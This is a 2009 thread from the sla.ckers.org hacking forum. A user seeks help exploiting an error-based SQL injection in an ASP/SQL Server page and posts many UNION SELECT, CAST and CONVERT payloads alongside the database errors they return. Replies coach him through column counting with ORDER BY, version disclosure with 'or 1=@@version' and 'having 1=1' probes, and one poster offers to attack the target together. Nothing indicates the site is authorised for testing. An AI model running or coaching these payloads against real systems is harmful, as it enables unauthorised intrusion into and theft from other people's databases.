Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Wired MS SQL Injection stuff...
Posted by: rickm
Date: October 14, 2009 10:46AM

Yo dudes!

I'm trying to exploit a SQL Injection is in a field in ASP with SQL Server - error based SQL Injection.

Some informations that may be helpful...


UNION%20 ALL%20 SELECT%20 CAST(@@version %20AS %20int) %20--

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'CVP' to data type int.

/include/lang.asp, line 19


UNION%20 ALL%20 SELECT%20 CAST(@@version %20AS %20text) %20--


Microsoft OLE DB Provider for SQL Server error '80040e14'

All queries combined using a UNION, INTERSECT or EXCEPT operator must
have an equal number of expressions in their target lists.

/include/lang.asp, line 26


UNION %20SELECT %20TOP %201 %20CAST(TABLE_NAME %20 AS %20 ntext)
%20FROM %20INFORMATION_SCHEMA.TABLES--


Microsoft OLE DB Provider for SQL Server error '80040e14'

The ntext data type cannot be selected as DISTINCT because it is not comparable.

/include/lang.asp, line 29


UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version) %20--

Microsoft OLE DB Provider for SQL Server error '80040e14'

All queries combined using a UNION, INTERSECT or EXCEPT operator must
have an equal number of expressions in their target lists.

/include/lang.asp, line 13

As you can see, the injections are not working, and I can't understand why. Can someone give me a hint?

Thank you

Options: ReplyQuote
Re: Wired MS SQL Injection stuff...
Posted by: lightos
Date: October 14, 2009 03:20PM

Refer to http://sla.ckers.org/forum/read.php?16,31832,31838#msg-31838 and follow the steps.
Just be sure to replace the error message in step 1 with your own.
(All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists).

Once completed, remember to pat yourself on the shoulder for being self-sufficient.

Options: ReplyQuote
Re: Wired MS SQL Injection stuff...
Posted by: rickm
Date: October 14, 2009 04:23PM

YO lightos

Looks like a good suggestion, however I did it and couldn't solve the problem.

Can you please translate to me what they mean by "operator must have an equal number of expressions in their target lists"?

At first I was thinking it could be different number of columns, but I tried...

UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL %20--
UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL,NULL %20--
UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL,NULL,NULL %20--
UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version),NULL,NULL,NULL,NULL %20--

And so on and I always get the same error.

Can you please give me a more specific hint?

thank you

Options: ReplyQuote
Re: Wired MS SQL Injection stuff...
Posted by: lightos
Date: October 14, 2009 09:08PM

You can figure out the # of columns used in the query using order by:

lang.asp?=eng' order by 1--
lang.asp?=eng' order by 2--
lang.asp?=eng' order by 3--

Keep going up until you get an error message.

You could also probably determine the version through error messages, try:
lang.asp?=eng' or 1=@@version--

Options: ReplyQuote
Re: Wired MS SQL Injection stuff...
Posted by: rickm
Date: October 15, 2009 02:54PM

Yo lightos

Thanks for your help.

I think this SQL Injection is really strange.

See...

Injecting:

lang.asp?=1' order by 1--

Result in:

Unclosed quotation mark after the character string ' order by 1--'.

I make me think that there is a problem with quotes or double quotes...

If I inject:

lang.asp?=1%20 order %20 by %20 1--

Result in:

Microsoft OLE DB Provider for SQL Server error '80040e14'

The text, ntext, and image data types cannot be compared or sorted, except when using IS NULL or LIKE operator.

If I inject other numbers in order by, like:

lang.asp?=1%20 order %20 by %20 2--
lang.asp?=1%20 order %20 by %20 3--
lang.asp?=1%20 order %20 by %20 4--

Microsoft OLE DB Provider for SQL Server error '80040e14'

The ORDER BY position number X is out of range of the number of items in the select list.

So, I believe the correct number of columns should be 1, right? But at the same time, it doesn't make sense, else the my first query should work, not?

My first query: UNION%20 ALL%20 SELECT%20 CONVERT(nvarchar,@@version) %20--

Also, I tried the following:

lang.asp?=1%20 order %20 by %20 '1'--

And it resulted in this strange behavior:

Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "1 order by '1'--"]'

/include/hdl.inc, line 109

Strange, ahn?

Ah, If I try:

' %20or %201=@@version%20--
%20or %201=@@version%20--

It always result in:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.

Do you really think the problem is related with number of columns?

Thanks.



Edited 1 time(s). Last edit at 10/15/2009 02:57PM by rickm.

Options: ReplyQuote
Re: Wired MS SQL Injection stuff...
Posted by: lightos
Date: October 15, 2009 09:47PM

Might be passing through two queries, first one has only 1 column, second one has more.
Someone had this problem a couple of days ago http://sla.ckers.org/forum/read.php?16,31532,31835.

Options: ReplyQuote
Re: Wired MS SQL Injection stuff...
Posted by: one23
Date: October 16, 2009 09:13AM

about this error :

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.

it's BLIND . so you have to do BSQL injection , if you like post the target here so me and others can take a look !

Options: ReplyQuote
Re: Wired MS SQL Injection stuff...
Posted by: delta
Date: October 19, 2009 03:18PM

try having 1=1--
or ' having 1=1--

Options: ReplyQuote
Re: Wired MS SQL Injection stuff...
Posted by: rickm
Date: October 19, 2009 08:01PM

Thanks for the answers.

Options: ReplyQuote


Sorry, only registered users may post in this forum.